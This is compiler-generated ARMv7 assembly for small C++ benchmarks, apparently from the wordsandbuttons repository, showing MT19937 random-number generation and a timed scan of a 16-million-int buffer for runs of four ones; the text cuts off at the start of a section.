.Ltmp2:
mov r5, r0
.LBB0_22: @ %_ZNSt6vectorIfSaIfEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#23:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
@ LSDA: pure-cleanup call-site table matching the .Ltmp* ranges above.
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
@ int std::uniform_int_distribution<int>::operator()(std::mt19937 &urng,
@                                                    const param_type &p)
@ Compiler-generated (clang 3.5.0) code: instruction order is significant,
@ comments only -- do not hand-edit instructions.
@ In:  r0 = this, r1 = &urng (engine state), r2 = &p where p = {a, b}
@ Out: r0 = a + value drawn uniformly from [0, b - a]
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1} @ r0 = p.a, r1 = p.b
sub r0, r1, r0 @ range = b - a (unsigned)
cmn r0, #1
beq .LBB1_6 @ range == 0xffffffff: a raw engine draw already covers it
@ BB#1:
@ Rejection sampling to avoid modulo bias:
@   scale = UINT_MAX / (range + 1);  accept draw x only when x < scale*(range+1).
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0 @ r8 = scale
ldr r1, [r5, #2496] @ engine word index (offset 2496 past the 624-word state)
mul r7, r8, r7 @ r7 = acceptance limit = scale * (range + 1)
movw r6, #22144
movw r4, #0
movt r6, #40236 @ r6 = 0x9d2c5680 (MT19937 tempering mask b)
movt r4, #61382 @ r4 = 0xefc60000 (MT19937 tempering mask c)
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
@ State exhausted: regenerate all 624 words, then reload the index.
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496] @ consume one state word
ldr r0, [r5, r1, lsl #2]
@ MT19937 tempering of the raw word in r0:
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2 @ reject draws >= limit; loop for another one
@ BB#5:
mov r1, r8
bl __aeabi_uidiv @ result = accepted_draw / scale  (now in [0, range])
b .LBB1_9
.LBB1_6:
@ Full-range case: one tempered draw, no division needed.
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236 @ 0x9d2c5680 (tempering mask b)
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382 @ 0xefc60000 (tempering mask c)
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9] @ p.a
add r0, r1, r0 @ return a + draw
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
@ void std::mt19937::_M_gen_rand() -- the MT19937 "twist": regenerate all
@ 624 32-bit state words in place, then reset the word index to 0.
@ r0 = this: state[624] at offset 0, word index at offset 2496.
@ Compiler-generated (clang 3.5.0); comments only, do not hand-edit.
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0]
movw r12, #45279
mov r2, #0
movt r12, #39176 @ r12 = 0x9908b0df (MT19937 matrix constant, XORed when low bit set)
.LBB2_1: @ =>This Inner Loop Header: Depth=1
@ Words 0..226 (byte offsets 0..904, #1588 = 397*4):
@   y = (state[i] & 0x80000000) | (state[i+1] & 0x7fffffff)
@   state[i] = state[i+397] ^ (y >> 1) ^ (y odd ? 0x9908b0df : 0)
add r1, r0, r2
ldr r3, [r1, #4]
ldr r5, [r1, #1588]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
@ Words 227..622: same recurrence, walked with a negated decrementing index
@ so the i+397 neighbour wraps into the freshly rewritten low half.
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]!
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
@ Final word 623 (offset 2492) wraps around: pairs with state[0] and uses
@ state[396] (offset 1584) as its i+397 neighbour; then index := 0.
ldr r1, [r0, #2492]
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496]
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
.type _GLOBAL__sub_I_andand_float.cpp,%function
_GLOBAL__sub_I_andand_float.cpp: @ @_GLOBAL__sub_I_andand_float.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
@ Static-initialization stub emitted by the compiler: construct the
@ translation unit's std::ios_base::Init object (_ZStL8__ioinit) and
@ register its destructor with __cxa_atexit (reached by tail call).
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
@ __cxa_atexit(&ios_base::Init::~Init, &__ioinit, &__dso_handle)
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr} @ restore before the tail call
b __cxa_atexit
.Ltmp17:
.size _GLOBAL__sub_I_andand_float.cpp, .Ltmp17-_GLOBAL__sub_I_andand_float.cpp
.Leh_func_end3:
.fnend
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_andand_float.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,480
|
exp/cpp_and_and/ARMv7/s/mul.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "mul.cpp"
.globl main
.align 3
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
@ int main() for the mul.cpp benchmark. Outline:
@  1. build a std::mt19937 on the stack (624 words at [sp,#32],
@     word index at [sp,#2528]) and a uniform_int_distribution<int>
@     param {0, 1} at [sp,#24]/[sp,#28];
@  2. heap-allocate 64,000,000 bytes (16,000,000 ints, pointer in r4)
@     and fill them with 0/1 draws;
@  3. time (chrono::system_clock) a scan that, at every 4-byte offset,
@     increments the counter at [sp,#20] when the four consecutive ints
@     all equal 1 (the "mul" predicate: product == 1 for 0/1 inputs);
@  4. print "time: <seconds> 1111s: <count>\n", delete the buffer, return 0.
@ Compiler-generated (clang 3.5.0); comments only, do not hand-edit.
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655 @ r2 = 0x6c078965 = 1812433253 (MT19937 seed multiplier)
str r0, [sp, #32] @ state[0] = seed value 0
.LBB0_1: @ =>This Inner Loop Header: Depth=1
@ state[i] = 1812433253 * (state[i-1] ^ (state[i-1] >> 30)) + i
eor r0, r0, r0, lsr #30
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528] @ index = 624: state marked exhausted, twist on first draw
mov r0, #1
str r5, [sp, #24] @ distribution param a = 0
str r0, [sp, #28] @ distribution param b = 1
.Ltmp0:
movw r8, #36864
movt r8, #976 @ r8 = 64,000,000 bytes = 16,000,000 ints
mov r0, r8
bl _Znwj @ operator new(64000000)
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset @ zero-fill (vector<int> value-initialization)
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
@ v[i] = dist(gen); r5 walks byte offsets 0..r8-4
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20] @ match counter = 0
bl _ZNSt6chrono3_V212system_clock3nowEv @ start timestamp -> [sp,#8]
movw r0, #36852
mov r1, #0
movt r0, #976 @ loop bound 63,999,988: stop 3 elements before the end
.LBB0_6: @ =>This Inner Loop Header: Depth=1
@ Load v[i..i+3] (r3, r7, r6, r2); branch-free test that all four == 1,
@ built from conditional moves; counter++ when they are.
mov r2, r4
ldr r3, [r2, r1]!
add r1, r1, #4
ldr r7, [r2, #4]
ldr r6, [r2, #8]
cmp r7, #1
mov r7, #0
mvneq r7, #0
cmp r3, #1
movne r7, r5
cmp r6, #1
ldr r2, [r2, #12]
movwne r6, #0
and r3, r6, r7
cmp r2, #1
rsb r3, r3, #0
movwne r2, #0
tst r2, r3
ldrne r2, [sp, #20]
addne r2, r2, #1
strne r2, [sp, #20]
cmp r1, r0
bne .LBB0_6
@ BB#7:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv @ end timestamp -> [sp,#0]
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i @ cout << "time: "
.Ltmp4:
@ BB#8:
@ elapsed = (end - start) as 64-bit ns count, converted to double seconds.
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0 @ 1e-9: ns -> s
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_ @ cout << seconds
mov r5, r0
.Ltmp6:
@ BB#9: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i @ << " 1111s: "
.Ltmp8:
@ BB#10: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_ @ << match count
.Ltmp10:
@ BB#11: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i @ << "\n"
.Ltmp12:
@ BB#12: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_14
@ BB#13:
mov r0, r4
bl _ZdlPv @ operator delete (vector destructor)
.LBB0_14: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
.LBB0_15:
@ Landing pads: free the buffer (if allocated) and re-raise.
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_18
@ BB#16:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_17:
.Ltmp2:
mov r5, r0
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#19:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
.handlerdata
@ LSDA call-site table: cleanup (delete the buffer) when operator new or
@ the ostream calls throw. Offsets are position-critical -- do not edit.
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
@ int std::uniform_int_distribution<int>::operator()(std::mt19937 &urng,
@                                                    const param_type &p)
@ Identical instantiation to the copy in the other .s files of this set.
@ r0 = this, r1 = &urng, r2 = &p {a, b}; returns a + uniform draw in [0, b-a].
@ Compiler-generated (clang 3.5.0); comments only, do not hand-edit.
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1}
sub r0, r1, r0 @ range = b - a
cmn r0, #1
beq .LBB1_6 @ full 32-bit range: no rejection needed
@ BB#1:
@ scale = UINT_MAX / (range+1); accept draws < scale*(range+1) (r7).
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7
movw r6, #22144
movw r4, #0
movt r6, #40236 @ r6 = 0x9d2c5680 (tempering mask b)
movt r4, #61382 @ r4 = 0xefc60000 (tempering mask c)
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496]
ldr r0, [r5, r1, lsl #2]
@ MT19937 tempering, then rejection test:
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2
@ BB#5:
mov r1, r8
bl __aeabi_uidiv @ result = draw / scale
b .LBB1_9
.LBB1_6:
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0 @ return a + draw
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
